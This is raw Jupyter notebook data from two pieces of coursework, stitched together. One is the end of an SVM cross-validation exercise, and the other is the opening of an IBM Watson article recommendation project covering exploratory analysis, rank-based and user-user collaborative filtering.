"import matplotlib.pyplot as plt\nimport math\n\nlst_cross_validated_error = []\nfor i in range(len(lst_acc_ploy_degree)):\n plt.figure()\n mean_val_lst = list(map(lambda x: np.mean(x), lst_acc_ploy_degree[i]))\n std_val_lst = list(map(lambda x: np.std(x), lst_acc_ploy_degree[i]))\n lst_cross_validated_error.append(mean_val_lst)\n\n plt.plot([math.log(3**k_val,3) for k_val in range(-k_val_sup, k_val_sup)],mean_val_lst, label=\"mean\")\n plt.plot([math.log(3**k_val,3) for k_val in range(-k_val_sup, k_val_sup)],np.add(mean_val_lst,std_val_lst))#, label=\"mean\")\n plt.plot([math.log(3**k_val,3) for k_val in range(-k_val_sup, k_val_sup)],np.subtract(mean_val_lst,std_val_lst))#, label=\"mean\")\n\n plt.title(f\"d={ploy_degree_lst[i]}\")\n plt.xlabel(\"The value of k in C=3^k\")\n plt.ylabel(\"Cross Validation Error\")\n plt.legend()\n ",
"_____no_output_____"
]
],
[
[
"## Question 4",
"_____no_output_____"
]
],
[
[
"argmin_ind = np.unravel_index(np.argmin(np.array(lst_cross_validated_error)), np.array(lst_cross_validated_error).shape)\nk_lst = [i for i in range(-k_val_sup,k_val_sup)]\nbest_d = ploy_degree_lst[argmin_ind[0]]\nbest_k = k_lst[argmin_ind[1]]\nbest_C = 3**(k_lst[argmin_ind[1]])\nprint(f\"The minimum cross validation error is {np.min(np.array(lst_cross_validated_error))}\")\nprint(f\"The index of the minimum cross validation error is {argmin_ind}\")\nprint(f\"The best C: {best_C} | The best d: {best_d}\")",
"The minimum cross validation error is 0.19297124600638976\nThe index of the minimum cross validation error is (2, 15)\nThe best C: 729 | The best d: 3\n"
],
[
"# Calculate test error\nsv_lst = []\nlst_test_error = []\nfor i in range(len(ploy_degree_lst)):\n best_m = svm_train(new_label, x_train,\"-c %s -t %s -d %s -q\" % (best_C, kernel_type, ploy_degree_lst[i]))\n p_label, p_acc, p_val = svm_predict(y_test, x_test, best_m)\n lst_test_error.append(p_acc[1])\n sv_lst.append(best_m.get_nr_sv())\n",
"Accuracy = 77.1073% (805/1044) (classification)\nAccuracy = 78.9272% (824/1044) (classification)\nAccuracy = 78.4483% (819/1044) (classification)\nAccuracy = 78.6398% (821/1044) (classification)\nAccuracy = 79.5977% (831/1044) (classification)\n"
],
[
"lst_cross_err_for_best_C = []\n\nfor i in range(len(ploy_degree_lst)):\n ind_C = np.where(np.array(k_lst)==best_k)[0][0]\n cross_err = lst_acc_ploy_degree[i][ind_C]\n \n mean_cross_err = np.mean(cross_err)\n std_cross_err = np.std(cross_err)\n \n lst_cross_err_for_best_C.append([mean_cross_err,std_cross_err])\n \n# Cross Validation Error\nplt.figure()\nplt.plot(ploy_degree_lst,np.array(lst_cross_err_for_best_C)[:,0],label = \"mean\")\nplt.plot(ploy_degree_lst,np.add(np.array(lst_cross_err_for_best_C)[:,0], np.array(lst_cross_err_for_best_C)[:,1]))\nplt.plot(ploy_degree_lst,np.subtract(np.array(lst_cross_err_for_best_C)[:,0], np.array(lst_cross_err_for_best_C)[:,1]))\nplt.legend()\nplt.xlabel(\"The polynomial degress\")\nplt.ylabel(\"Cross Validation Errors\")\nplt.title(\"Cross Validation Error for the best C=C^*\")\n\n# Test Error\nplt.figure()\nplt.plot(ploy_degree_lst, lst_test_error)\nplt.xlabel(\"The polynomial degress\")\nplt.ylabel(\"Test Errors\")\nplt.title(\"Test Error for the best C=C^*\")",
"_____no_output_____"
],
[
"# Numbers of support vectors\nplt.figure()\nplt.plot(ploy_degree_lst, sv_lst)\nplt.xlabel(\"The polynomial degress\")\nplt.ylabel(\"Numbers of support vectors\")\nplt.title(\"Numbers of support vectors for the best C=C^*\")",
"_____no_output_____"
]
],
[
[
"## Question 5",
"_____no_output_____"
]
],
[
[
"lst_train_err = []\nlst_test_err = []\n\nfor num_exs in range(1,train_length,500):\n best_m = svm_train(new_label[:num_exs], x_train[:num_exs],\"-c %s -t %s -d %s -q\" % (best_C, kernel_type, best_d))\n \n p_label, p_acc_train, p_val = svm_predict(new_label[:num_exs], x_train[:num_exs], best_m)\n p_label, p_acc_test, p_val = svm_predict(y_test, x_test, best_m)\n \n lst_train_err.append(p_acc_train[1])\n lst_test_err.append(p_acc_test[1])",
"Accuracy = 100% (1/1) (classification)\nAccuracy = 52.2989% (546/1044) (classification)\nAccuracy = 87.2255% (437/501) (classification)\nAccuracy = 72.4138% (756/1044) (classification)\nAccuracy = 83.6164% (837/1001) (classification)\nAccuracy = 74.8084% (781/1044) (classification)\nAccuracy = 82.545% (1239/1501) (classification)\nAccuracy = 79.6935% (832/1044) (classification)\nAccuracy = 81.3093% (1627/2001) (classification)\nAccuracy = 78.9272% (824/1044) (classification)\nAccuracy = 81.6074% (2041/2501) (classification)\nAccuracy = 79.4061% (829/1044) (classification)\nAccuracy = 81.7727% (2454/3001) (classification)\nAccuracy = 78.2567% (817/1044) (classification)\n"
],
[
"plt.figure()\nplt.plot([num_exs for num_exs in range(1,train_length,500)], lst_train_err, label=\"train error\")\nplt.plot([num_exs for num_exs in range(1,train_length,500)], lst_test_err, label=\"test error\")\nplt.legend()\nplt.xlabel(\"Numbers of training examples\")\nplt.ylabel(\"Error\")\nplt.title(\"The training and test errors at best C and best d\")",
"_____no_output_____"
]
],
[
[
"## Question 6 c)\n\nFor the hinge loss minimization problem of SVM, we consider the sklearn library implementation.\n\nBy sklearn documentation, the `SGDClassifier` trained with the hinge loss using Stochastic Gradient Descent is equivalent to a linear SVM.",
"_____no_output_____"
]
],
[
[
"from sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import SGDClassifier",
"_____no_output_____"
],
[
"clf = SGDClassifier(loss=\"hinge\")",
"_____no_output_____"
],
[
"# Test Error\nclf.fit(x_train, new_label)\npred_svm_test = clf.predict(x_test)\nsvm_hinge_acc_Test = accuracy_score(y_test,pred_svm_test)",
"_____no_output_____"
],
[
"# Five-Folds cross validation error\nlst_svm_hinge_cross_validation_acc = []\n\nfor ind, train_set in enumerate(lst_k_fold_dataset):\n X_test_tmp = train_set[:,0]\n y_test_tmp = train_set[:,1]\n\n X_tmp = np.concatenate([lst_k_fold_dataset[i] for i,x in enumerate(lst_k_fold_dataset) if i!=ind])[:,0]\n y_tmp = np.concatenate([lst_k_fold_dataset[i] for i,x in enumerate(lst_k_fold_dataset) if i!=ind])[:,1]\n \n clf.fit(scipy.sparse.vstack(X_tmp),np.array(y_tmp,dtype='float'))\n pred_svm_hinge = clf.predict(scipy.sparse.vstack(X_test_tmp))\n svm_hinge_acc = accuracy_score(np.array(y_test_tmp,dtype='float'),pred_svm_hinge)\n \n lst_svm_hinge_cross_validation_acc.append(svm_hinge_acc)",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\n\nplt.figure()\nplt.scatter([1,2,3,4,5],[svm_hinge_acc_Test]*5,label=\"Test\")\nplt.scatter([1,2,3,4,5],[1-i for i in lst_svm_hinge_cross_validation_acc], label=\"Five Folds\")\nplt.xlabel(\"Trial numbers\")\nplt.ylabel(\"Cross Validation Error\")\nplt.legend()\nplt.title(\"Five Fold Cross Validation Error for SVM with Hinge Loss trained using SGD\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb0275f643d3ff4f2fddc51a416ce0f4750257a7 | 41,014 | ipynb | Jupyter Notebook | examples/classification/ABIDE_classification.ipynb | FL33TW00D/rustyDTW | 37ab548c34e041d969083ac1f1ae84d3d941c014 | [
"MIT"
] | 9 | 2021-06-24T07:04:22.000Z | 2022-03-28T15:24:29.000Z | examples/classification/ABIDE_classification.ipynb | FL33TW00D/rustyDTW | 37ab548c34e041d969083ac1f1ae84d3d941c014 | [
"MIT"
] | null | null | null | examples/classification/ABIDE_classification.ipynb | FL33TW00D/rustyDTW | 37ab548c34e041d969083ac1f1ae84d3d941c014 | [
"MIT"
] | 1 | 2021-06-24T03:48:46.000Z | 2021-06-24T03:48:46.000Z | 135.359736 | 32,116 | 0.870581 | [
[
[
"#Modified version of the following script from nilearn: \n#https://nilearn.github.io/auto_examples/03_connectivity/plot_group_level_connectivity.html\nfrom nilearn import datasets\nfrom tqdm.notebook import tqdm\n\nabide_dataset = datasets.fetch_abide_pcp(n_subjects=200)",
"/home/fleetwood/miniconda3/lib/python3.6/site-packages/numpy/lib/npyio.py:2349: VisibleDeprecationWarning: Reading unicode strings without specifying the encoding argument is deprecated. Set the encoding, use None for the system default.\n output = genfromtxt(fname, **kwargs)\n"
],
[
"abide_dataset.keys()",
"_____no_output_____"
],
[
"from nilearn import input_data\n\nmsdl_data = datasets.fetch_atlas_msdl()\nmasker = input_data.NiftiMapsMasker(\n msdl_data.maps, resampling_target=\"data\", t_r=2, detrend=True,\n low_pass=.1, high_pass=.01, memory='nilearn_cache', memory_level=1).fit()",
"_____no_output_____"
],
[
"pooled_subjects = []\ngroups = []\nfor func_file, dx in tqdm(zip(abide_dataset['func_preproc'], abide_dataset['phenotypic']['DX_GROUP'])):\n time_series = masker.transform(func_file)\n pooled_subjects.append(time_series)\n groups.append(dx)\n\nprint(f'Dataset has {len(pooled_subjects)} subjects')",
"_____no_output_____"
],
[
"n_regions = pooled_subjects[0].shape[1]",
"_____no_output_____"
],
[
"def sym_matrix_to_vec(symmetric):\n tril_mask = np.tril(np.ones(symmetric.shape[-2:]), k=-1).astype(np.bool)\n return symmetric[..., tril_mask]",
"_____no_output_____"
],
[
"def compute_dtw(subjects, n_regions):\n dtw_output = []\n for subj in subjects:\n dtw_output.append(\n rust_dtw.dtw_connectome(\n connectome=subj,\n window=100, \n distance_mode=\"euclidean\")\n )\n connectomes = []\n #Post processing them as per paper recommendations\n for vec in dtw_output:\n sym = np.zeros((n_regions, n_regions))\n sym[i_lower] = vec\n sym += sym.T\n sym *= -1\n StandardScaler().fit_transform(sym)\n connectomes.append(sym_matrix_to_vec(sym))\n return connectomes",
"_____no_output_____"
],
[
"from sklearn.svm import LinearSVC\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import accuracy_score\nfrom nilearn.connectome import ConnectivityMeasure\nimport matplotlib.pyplot as plt\nimport rust_dtw\nimport numpy as np\nimport copy\n\nkinds = ['dtw', 'correlation', 'partial correlation', 'tangent']\n# kinds = ['correlation']\n_, classes = np.unique(groups, return_inverse=True)\ncv = StratifiedShuffleSplit(n_splits=15, random_state=0, test_size=5)\npooled_subjects = np.asarray(pooled_subjects)\n\nscores = {}\nfor kind in kinds:\n print('PROCESSING: ', kind)\n scores[kind] = []\n for train, test in cv.split(pooled_subjects, classes):\n if kind == 'dtw': \n connectomes = compute_dtw(pooled_subjects[train], n_regions)\n test_connectomes = compute_dtw(pooled_subjects[test], n_regions)\n else:\n connectivity = ConnectivityMeasure(kind=kind, vectorize=True)\n connectomes = connectivity.fit_transform(pooled_subjects[train])\n test_connectomes = connectivity.transform(pooled_subjects[test])\n \n classifier = LinearSVC(max_iter=10000).fit(connectomes, classes[train])\n # make predictions for the left-out test subjects\n predictions = classifier.predict(test_connectomes)\n \n # store the accuracy for this cross-validation fold\n scores[kind].append(accuracy_score(classes[test], predictions))",
"PROCESSING: dtw\n"
],
[
"import matplotlib.pyplot as plt\nimport seaborn\nplt.style.use('seaborn-white')\nseaborn.set_context('poster')\nmean_scores = [np.mean(scores[kind]) for kind in kinds]\nprint(list(zip(mean_scores, kinds) ))\nscores_std = [np.std(scores[kind]) for kind in kinds]\n\nplt.figure(figsize=(15, 10))\npositions = np.arange(len(kinds)) * .1 + .1\nplt.barh(positions, mean_scores, align='center', height=.05, xerr=scores_std)\nyticks = [k.replace(' ', '\\n') for k in kinds]\nplt.yticks(positions, yticks)\nplt.gca().grid(True)\nplt.gca().set_axisbelow(True)\nplt.xlabel('Classification accuracy')\nplt.tight_layout()\nplt.savefig('accuracy.png', bbox_inches=\"tight\", dpi=300)",
"[(0.6933333333333332, 'dtw'), (0.6400000000000001, 'correlation'), (0.6133333333333334, 'partial correlation'), (0.6933333333333332, 'tangent')]\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0284482a822310205e9ac9f85bbb72a3bd46a2 | 16,095 | ipynb | Jupyter Notebook | probabilitymassfunction.ipynb | hasanburakaydin/Plugins | 73ddbf3b6ab145869d657b8d124fe444c8f61dfe | [
"MIT"
] | null | null | null | probabilitymassfunction.ipynb | hasanburakaydin/Plugins | 73ddbf3b6ab145869d657b8d124fe444c8f61dfe | [
"MIT"
] | null | null | null | probabilitymassfunction.ipynb | hasanburakaydin/Plugins | 73ddbf3b6ab145869d657b8d124fe444c8f61dfe | [
"MIT"
] | null | null | null | 145 | 12,790 | 0.875241 | [
[
[
"<a href=\"https://colab.research.google.com/github/hasanburakaydin/Plugins/blob/master/probabilitymassfunction.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"Faruk ve Talha isimli öğrencilerden **birini** seçeceğiz.\n* Faruk’u seçme olasılığımız **P(F) = 0.6**,\n* Talha’yı seçme olasılığımız **P(T) = 0.4** olsun. \n* Bu durumu **bernoulli** diyagramı ile gösterebiliriz.\n* **Bernoulli ayrık rassal değişkenler**den oluşan bir diyagramdır.\n* Bu yüzden **Olasılık kütle fonksiyonu (PMF)**‘yi kullanmalıyız.",
"_____no_output_____"
]
],
[
[
"## 205112015 Hasan Burak AYDIN Olasılık Kütle Fonksiyonu (PMF) Çalışması\n\nfrom scipy.stats import bernoulli #bernoulli kütle yoğunluk fonksiyonunun plot diyagramı için kütüphanelerin dahil edilmesi\nimport matplotlib.pyplot as plt\n\nX = [0,1] #X rassal değişkenimizin aldığı değerlerin diziye atanması\npF = 0.6 #Faruk'u seçme olasılığının pF değişkenine atanması\nplt.bar(X,bernoulli.pmf(X,pF),width=0.1,color=[\"r\",\"b\"]) #bernoulli kütle yoğunluk fonksiyonunun plot diyagramının çizilmesi\nplt.title(\"OLASILIK KÜTLE FONKSİYONU\")\nplt.xlabel(\"X RASSAL DEĞİŞKENİNİN DEĞERLERİ\")\nplt.ylabel(\"OLAYIN GERÇEKLEŞMESİ OLASILIĞI\")\n\n\n",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
cb028b2617c31c25b488712c71895c846a3ac269 | 130,702 | ipynb | Jupyter Notebook | Recommendations_with_IBM.ipynb | MihaiLai/Recommendation-System | 7bdb9964a818d3e279847a7e41a18a8e2cacbbb6 | [
"MIT"
] | null | null | null | Recommendations_with_IBM.ipynb | MihaiLai/Recommendation-System | 7bdb9964a818d3e279847a7e41a18a8e2cacbbb6 | [
"MIT"
] | null | null | null | Recommendations_with_IBM.ipynb | MihaiLai/Recommendation-System | 7bdb9964a818d3e279847a7e41a18a8e2cacbbb6 | [
"MIT"
] | null | null | null | 59.790485 | 20,060 | 0.683333 | [
[
[
"# Recommendations with IBM\n\nIn this notebook, you will be putting your recommendation skills to use on real data from the IBM Watson Studio platform. \n\n\nYou may either submit your notebook through the workspace here, or you may work from your local machine and submit through the next page. Either way assure that your code passes the project [RUBRIC](https://review.udacity.com/#!/rubrics/2322/view). **Please save regularly.**\n\nBy following the table of contents, you will build out a number of different methods for making recommendations that can be used for different situations. \n\n\n## Table of Contents\n\nI. [Exploratory Data Analysis](#Exploratory-Data-Analysis)<br>\nII. [Rank Based Recommendations](#Rank)<br>\nIII. [User-User Based Collaborative Filtering](#User-User)<br>\nIV. [Content Based Recommendations (EXTRA - NOT REQUIRED)](#Content-Recs)<br>\nV. [Matrix Factorization](#Matrix-Fact)<br>\nVI. [Extras & Concluding](#conclusions)\n\nAt the end of the notebook, you will find directions for how to submit your work. Let's get started by importing the necessary libraries and reading in the data.",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport project_tests as t\nimport pickle\n\n%matplotlib inline\n\ndf = pd.read_csv('data/user-item-interactions.csv')\ndf_content = pd.read_csv('data/articles_community.csv')\ndel df['Unnamed: 0']\ndel df_content['Unnamed: 0']\n\n# Show df to get an idea of the data\ndf.head()",
"_____no_output_____"
],
[
"df.shape",
"_____no_output_____"
],
[
"df.article_id = df.article_id.astype('str')",
"_____no_output_____"
],
[
"# Show df_content to get an idea of the data\ndf_content.head()",
"_____no_output_____"
]
],
[
[
"### <a class=\"anchor\" id=\"Exploratory-Data-Analysis\">Part I : Exploratory Data Analysis</a>\n\nUse the dictionary and cells below to provide some insight into the descriptive statistics of the data.\n\n`1.` What is the distribution of how many articles a user interacts with in the dataset? Provide a visual and descriptive statistics to assist with giving a look at the number of times each user interacts with an article. ",
"_____no_output_____"
]
],
[
[
"count_interactions = df.groupby('email').count()['article_id']\nplt.hist(count_interactions, bins=30);\nplt.title('Number of times each user interacts with an article');\nplt.xlabel('Number of Interactions');\nplt.ylabel('Number of Articles');",
"_____no_output_____"
],
[
"# Fill in the median and maximum number of user_article interactios below\n\nmedian_val = df['email'].value_counts().median() # 50% of individuals interact with ____ number of articles or fewer.\nmax_views_by_user = df['email'].value_counts().max()# The maximum number of user-article interactions by any 1 user is ______.",
"_____no_output_____"
]
],
[
[
"`2.` Explore and remove duplicate articles from the **df_content** dataframe. ",
"_____no_output_____"
]
],
[
[
"# Find and explore duplicate articles\ndf_content[df_content.duplicated()]",
"_____no_output_____"
],
[
"# Remove any rows that have the same article_id - only keep the first\ndf_content.drop_duplicates(subset=['article_id'],keep='first',inplace=True)",
"_____no_output_____"
]
],
[
[
"`3.` Use the cells below to find:\n\n**a.** The number of unique articles that have an interaction with a user. \n**b.** The number of unique articles in the dataset (whether they have any interactions or not).<br>\n**c.** The number of unique users in the dataset. (excluding null values) <br>\n**d.** The number of user-article interactions in the dataset.",
"_____no_output_____"
]
],
[
[
"unique_articles = len(pd.unique(df['article_id']))# The number of unique articles that have at least one interaction\ntotal_articles = len(pd.unique(df_content['article_id']))# The number of unique articles on the IBM platform\nunique_users = len(pd.unique(df['email'].dropna()))# The number of unique users\nuser_article_interactions = len(df)# The number of user-article interactions",
"_____no_output_____"
]
],
[
[
"`4.` Use the cells below to find the most viewed **article_id**, as well as how often it was viewed. After talking to the company leaders, the `email_mapper` function was deemed a reasonable way to map users to ids. There were a small number of null values, and it was found that all of these null values likely belonged to a single user (which is how they are stored using the function below).",
"_____no_output_____"
]
],
[
[
"most_viewed_article_id = str(df.article_id.value_counts().axes[0][0])# The most viewed article in the dataset as a string with one value following the decimal \nmax_views = df.article_id.value_counts().max()# The most viewed article in the dataset was viewed how many times?",
"_____no_output_____"
],
[
"## No need to change the code here - this will be helpful for later parts of the notebook\n# Run this cell to map the user email to a user_id column and remove the email column\n\ndef email_mapper():\n coded_dict = dict()\n cter = 1\n email_encoded = []\n \n for val in df['email']:\n if val not in coded_dict:\n coded_dict[val] = cter\n cter+=1\n \n email_encoded.append(coded_dict[val])\n return email_encoded\n\nemail_encoded = email_mapper()\ndel df['email']\ndf['user_id'] = email_encoded\n\n# show header\ndf.head()",
"_____no_output_____"
],
[
"## If you stored all your results in the variable names above, \n## you shouldn't need to change anything in this cell\n\nsol_1_dict = {\n '`50% of individuals have _____ or fewer interactions.`': median_val,\n '`The total number of user-article interactions in the dataset is ______.`': user_article_interactions,\n '`The maximum number of user-article interactions by any 1 user is ______.`': max_views_by_user,\n '`The most viewed article in the dataset was viewed _____ times.`': max_views,\n '`The article_id of the most viewed article is ______.`': most_viewed_article_id,\n '`The number of unique articles that have at least 1 rating ______.`': unique_articles,\n '`The number of unique users in the dataset is ______`': unique_users,\n '`The number of unique articles on the IBM platform`': total_articles\n}\n\n# Test your dictionary against the solution\nt.sol_1_test(sol_1_dict)",
"It looks like you have everything right here! Nice job!\n"
]
],
[
[
"### <a class=\"anchor\" id=\"Rank\">Part II: Rank-Based Recommendations</a>\n\nUnlike in the earlier lessons, we don't actually have ratings for whether a user liked an article or not. We only know that a user has interacted with an article. In these cases, the popularity of an article can really only be based on how often an article was interacted with.\n\n`1.` Fill in the function below to return the **n** top articles ordered with most interactions as the top. Test your function using the tests below.",
"_____no_output_____"
]
],
[
[
"def get_top_articles(n, df=df):\n '''\n INPUT:\n n - (int) the number of top articles to return\n df - (pandas dataframe) df as defined at the top of the notebook \n \n OUTPUT:\n top_articles - (list) A list of the top 'n' article titles \n \n '''\n top_articles = df['title'].value_counts().axes[0][:n].tolist()\n \n return top_articles # Return the top article titles from df (not df_content)\n\ndef get_top_article_ids(n, df=df):\n '''\n INPUT:\n n - (int) the number of top articles to return\n df - (pandas dataframe) df as defined at the top of the notebook \n \n OUTPUT:\n top_articles - (list) A list of the top 'n' article titles \n \n '''\n top_articles = df['article_id'].value_counts().axes[0][:n].tolist()\n \n return top_articles # Return the top article ids",
"_____no_output_____"
],
[
"print(get_top_articles(10))\nprint(get_top_article_ids(10))",
"['use deep learning for image classification', 'insights from new york car accident reports', 'visualize car data with brunel', 'use xgboost, scikit-learn & ibm watson machine learning apis', 'predicting churn with the spss random tree algorithm', 'healthcare python streaming application demo', 'finding optimal locations of new store using decision optimization', 'apache spark lab, part 1: basic concepts', 'analyze energy consumption in buildings', 'gosales transactions for logistic regression model']\n['1429.0', '1330.0', '1431.0', '1427.0', '1364.0', '1314.0', '1293.0', '1170.0', '1162.0', '1304.0']\n"
],
[
"# Test your function by returning the top 5, 10, and 20 articles\ntop_5 = get_top_articles(5)\ntop_10 = get_top_articles(10)\ntop_20 = get_top_articles(20)\n\n# Test each of your three lists from above\nt.sol_2_test(get_top_articles)",
"Your top_5 looks like the solution list! Nice job.\nYour top_10 looks like the solution list! Nice job.\nYour top_20 looks like the solution list! Nice job.\n"
]
],
[
[
"### <a class=\"anchor\" id=\"User-User\">Part III: User-User Based Collaborative Filtering</a>\n\n\n`1.` Use the function below to reformat the **df** dataframe to be shaped with users as the rows and articles as the columns. \n\n* Each **user** should only appear in each **row** once.\n\n\n* Each **article** should only show up in one **column**. \n\n\n* **If a user has interacted with an article, then place a 1 where the user-row meets for that article-column**. It does not matter how many times a user has interacted with the article, all entries where a user has interacted with an article should be a 1. \n\n\n* **If a user has not interacted with an item, then place a zero where the user-row meets for that article-column**. \n\nUse the tests to make sure the basic structure of your matrix matches what is expected by the solution.",
"_____no_output_____"
]
],
[
[
"# create the user-article matrix with 1's and 0's\n\ndef create_user_item_matrix(df):\n '''\n INPUT:\n df - pandas dataframe with article_id, title, user_id columns\n \n OUTPUT:\n user_item - user item matrix \n \n Description:\n Return a matrix with user ids as rows and article ids on the columns with 1 values where a user interacted with \n an article and a 0 otherwise\n '''\n \n user_item = df.groupby(['user_id', 'article_id']).apply(lambda x:1).unstack().fillna(0)\n return user_item # return the user_item matrix \n\nuser_item = create_user_item_matrix(df)",
"_____no_output_____"
],
[
"## Tests: You should just need to run this cell. Don't change the code.\nassert user_item.shape[0] == 5149, \"Oops! The number of users in the user-article matrix doesn't look right.\"\nassert user_item.shape[1] == 714, \"Oops! The number of articles in the user-article matrix doesn't look right.\"\nassert user_item.sum(axis=1)[1] == 36, \"Oops! The number of articles seen by user 1 doesn't look right.\"\nprint(\"You have passed our quick tests! Please proceed!\")",
"You have passed our quick tests! Please proceed!\n"
],
[
"user_item.head(2)",
"_____no_output_____"
]
],
[
[
"`2.` Complete the function below which should take a user_id and provide an ordered list of the most similar users to that user (from most similar to least similar). The returned result should not contain the provided user_id, as we know that each user is similar to him/herself. Because the results for each user here are binary, it (perhaps) makes sense to compute similarity as the dot product of two users. \n\nUse the tests to test your function.",
"_____no_output_____"
]
],
[
[
"def find_similar_users(user_id, user_item=user_item):\n '''\n INPUT:\n user_id - (int) a user_id\n user_item - (pandas dataframe) matrix of users by articles: \n 1's when a user has interacted with an article, 0 otherwise\n \n OUTPUT:\n similar_users - (list) an ordered list where the closest users (largest dot product users)\n are listed first\n \n Description:\n Computes the similarity of every pair of users based on the dot product\n Returns an ordered\n \n '''\n# # compute similarity of each user to the provided user\n\n similarity = []\n for user in range(1, user_item.shape[0]+1):\n sim = np.dot(np.array(user_item.loc[user_id]),np.array(user_item.loc[user]))\n similarity.append((user, sim))\n\n # sort by similarity\n similarity.sort(key=lambda x: x[1], reverse=True)\n\n # create list of just the ids\n most_similar_users =[item[0] for item in similarity]\n\n # remove the own user's id\n most_similar_users.remove(user_id)\n return most_similar_users # return a list of the users in order from most to least similar\n ",
"_____no_output_____"
],
[
"# Do a spot check of your function\nprint(\"The 10 most similar users to user 1 are: {}\".format(find_similar_users(1)[:10]))\nprint(\"The 5 most similar users to user 3933 are: {}\".format(find_similar_users(3933)[:5]))\nprint(\"The 3 most similar users to user 46 are: {}\".format(find_similar_users(46)[:3]))",
"The 10 most similar users to user 1 are: [3933, 23, 3782, 203, 4459, 131, 3870, 46, 4201, 49]\nThe 5 most similar users to user 3933 are: [1, 23, 3782, 203, 4459]\nThe 3 most similar users to user 46 are: [4201, 23, 3782]\n"
]
],
[
[
"`3.` Now that you have a function that provides the most similar users to each user, you will want to use these users to find articles you can recommend. Complete the functions below to return the articles you would recommend to each user. ",
"_____no_output_____"
]
],
[
[
"def get_article_names(article_ids, df=df):\n '''\n INPUT:\n article_ids - (list) a list of article ids\n df - (pandas dataframe) df as defined at the top of the notebook\n \n OUTPUT:\n article_names - (list) a list of article names associated with the list of article ids \n (this is identified by the title column)\n '''\n # Your code here\n article_names = []\n for article in article_ids:\n article_names.append(df[df.article_id == article]['title'].values[0])\n return article_names # Return the article names associated with list of article ids\n\n\ndef get_user_articles(user_id, user_item=user_item):\n '''\n INPUT:\n user_id - (int) a user id\n user_item - (pandas dataframe) matrix of users by articles: \n 1's when a user has interacted with an article, 0 otherwise\n \n OUTPUT:\n article_ids - (list) a list of the article ids seen by the user\n article_names - (list) a list of article names associated with the list of article ids \n (this is identified by the doc_full_name column in df_content)\n \n Description:\n Provides a list of the article_ids and article titles that have been seen by a user\n '''\n article_ids = user_item.loc[user_id][user_item.loc[user_id] == 1].index.tolist()\n article_names = get_article_names(article_ids)\n \n return article_ids, article_names # return the ids and names\n\n\ndef user_user_recs(user_id, m=10):\n '''\n INPUT:\n user_id - (int) a user id\n m - (int) the number of recommendations you want for the user\n \n OUTPUT:\n recs - (list) a list of recommendations for the user\n \n Description:\n Loops through the users based on closeness to the input user_id\n For each user - finds articles the user hasn't seen before and provides them as recs\n Does this until m recommendations are found\n \n Notes:\n Users who are the same closeness are chosen arbitrarily as the 'next' user\n \n For the user where the number of recommended articles starts below m \n and ends exceeding m, the last items are chosen arbitrarily\n \n '''\n recs = set()\n most_similar_users = find_similar_users(user_id)\n seen_aritcle,_ = get_user_articles(user_id)\n for user in most_similar_users:\n neighbs_likes,_ = get_user_articles(user)\n new_recs = np.setdiff1d(neighbs_likes, seen_aritcle, assume_unique=True)\n for item in new_recs:\n recs.add(item)\n if len(recs) > m-1:\n return recs\n return recs # return your recommendations for this user_id ",
"_____no_output_____"
],
[
"# Check Results\nget_article_names(user_user_recs(1, 10)) # Return 10 recommendations for user 1",
"_____no_output_____"
],
[
"# Test your functions here - No need to change this code - just run this cell\nassert set(get_article_names(['1024.0', '1176.0', '1305.0', '1314.0', '1422.0', '1427.0'])) == set(['using deep learning to reconstruct high-resolution audio', 'build a python app on the streaming analytics service', 'gosales transactions for naive bayes model', 'healthcare python streaming application demo', 'use r dataframes & ibm watson natural language understanding', 'use xgboost, scikit-learn & ibm watson machine learning apis']), \"Oops! Your the get_article_names function doesn't work quite how we expect.\"\nassert set(get_article_names(['1320.0', '232.0', '844.0'])) == set(['housing (2015): united states demographic measures','self-service data preparation with ibm data refinery','use the cloudant-spark connector in python notebook']), \"Oops! Your the get_article_names function doesn't work quite how we expect.\"\nassert set(get_user_articles(20)[0]) == set(['1320.0', '232.0', '844.0'])\nassert set(get_user_articles(20)[1]) == set(['housing (2015): united states demographic measures', 'self-service data preparation with ibm data refinery','use the cloudant-spark connector in python notebook'])\nassert set(get_user_articles(2)[0]) == set(['1024.0', '1176.0', '1305.0', '1314.0', '1422.0', '1427.0'])\nassert set(get_user_articles(2)[1]) == set(['using deep learning to reconstruct high-resolution audio', 'build a python app on the streaming analytics service', 'gosales transactions for naive bayes model', 'healthcare python streaming application demo', 'use r dataframes & ibm watson natural language understanding', 'use xgboost, scikit-learn & ibm watson machine learning apis'])\nprint(\"If this is all you see, you passed all of our tests! Nice job!\")",
"If this is all you see, you passed all of our tests! Nice job!\n"
]
],
[
[
"`4.` Now we are going to improve the consistency of the **user_user_recs** function from above. \n\n* Instead of arbitrarily choosing when we obtain users who are all the same closeness to a given user - choose the users that have the most total article interactions before choosing those with fewer article interactions.\n\n\n* Instead of arbitrarily choosing articles from the user where the number of recommended articles starts below m and ends exceeding m, choose articles with the articles with the most total interactions before choosing those with fewer total interactions. This ranking should be what would be obtained from the **top_articles** function you wrote earlier.",
"_____no_output_____"
]
],
[
[
